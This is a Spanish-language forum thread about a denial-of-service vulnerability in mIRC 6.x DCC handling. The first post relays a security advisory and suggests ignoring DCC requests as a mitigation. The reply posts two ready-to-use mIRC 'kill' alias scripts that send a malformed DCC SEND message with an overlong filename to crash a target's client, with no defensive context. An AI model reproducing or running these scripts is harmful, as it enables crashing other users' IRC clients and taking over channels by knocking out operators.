Resultados 1 al 2 de 2

Tema: Denegación de servicio en mIRC

  1. #1 Denegación de servicio en mIRC 
    Avanzado
    Fecha de ingreso
    Oct 2001
    Ubicación
    Territorio Hostil
    Mensajes
    582
    Descargas
    1
    Uploads
    0
    Se ha descubierto una nueva vulnerabilidad en mIRC, que puede ser
    explotada para provocar una denegación de servicio durante una
    comunicación por DCC.

    mIRC es uno de los clientes de IRC (Internet Relay Chat) para entornos
    Windows más populares entre los usuarios de dicho servicio y DCC es un
    protocolo utilizado para el intercambio de archivos con otros usuarios
    a través de IRC.

    La vulnerabilidad descubierta se debe a un error durante el proceso
    peticiones DCC, que puede ser explotado para interrumpir la ejecución
    del cliente del usuario. No se ha querido dar una información más
    detallada acerca de la naturaleza del problema que permite este
    ataque, aunque se sabe que acepta a todas las versiones 6.x, incluida
    la recientemente lanzada 6.11.

    Se tiene constancia de que hay código de explotación de esta
    vulnerabilidad circulando por la red, y que está siendo utilizado de
    forma activa contra canales (tirando a todos los ops para conseguir
    hacerse con ellos) y usuarios.

    El autor del cliente de IRC ha sido informado de dicha vulnerabilidad,
    pero mientras una actualización salga a la luz, se recomienda ignorar
    las peticiones DCC de todos los usuarios excepto de los de confianza.
    Si se quiere cortar por lo sano, se pueden ignorar todas las
    peticiones DCC, con tan sólo escribir este comando:
    /ignore -wd *
    FUENTE DE LA NOTICIA : WWW.HISPASEC.COM
    Sn@ke
    snake@vilecha.com
    www.vilecha.com
    [Internet tiene memoria]
    Citar  
     

  2. #2  
    Ex-moderador
    Fecha de ingreso
    Apr 2002
    Mensajes
    3.184
    Descargas
    0
    Uploads
    0
    kill { raw -q privmsg $1 : $+ $chr(1) $+ DCC SEND "a b c d e f g h i j k l m n o p q r s t u v w x y z 1 2 3 4 5 6 7 8 9 0 1 2 3 4 " 1 2 3 $longip(127.0.0.1) 1111 $+ $chr(1) }


    /alias kill /eval /quote privmsg $0 :\x01DCC SEND "a b c d e f g h i j k l m n o p q r s t u v w x y z 1 2 3 4 5 6 7 8 9 0 1 2 3 4 " 1 2 3 2130706433 1111\x01

    TseTse
    ' La corrupción, el síntoma más infalible de la libertad que otorga la Constitución '
    Citar  
     

Temas similares

  1. Respuestas: 0
    Último mensaje: 29-12-2011, 09:58
  2. Denegación de servicio en Cisco IOS XR
    Por LUK en el foro VULNERABILIDADES
    Respuestas: 0
    Último mensaje: 02-09-2010, 10:00
  3. Denegación de servicio en RealPlayer
    Por clarinetista en el foro NOTICIAS
    Respuestas: 0
    Último mensaje: 21-01-2007, 13:08
  4. Denegación de servicio en Apache 2
    Por LUK en el foro VULNERABILIDADES
    Respuestas: 0
    Último mensaje: 23-03-2004, 21:14
  5. Denegación de servicio en Eudora
    Por calymax en el foro NOTICIAS
    Respuestas: 0
    Último mensaje: 28-05-2003, 07:00

Marcadores

Marcadores

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •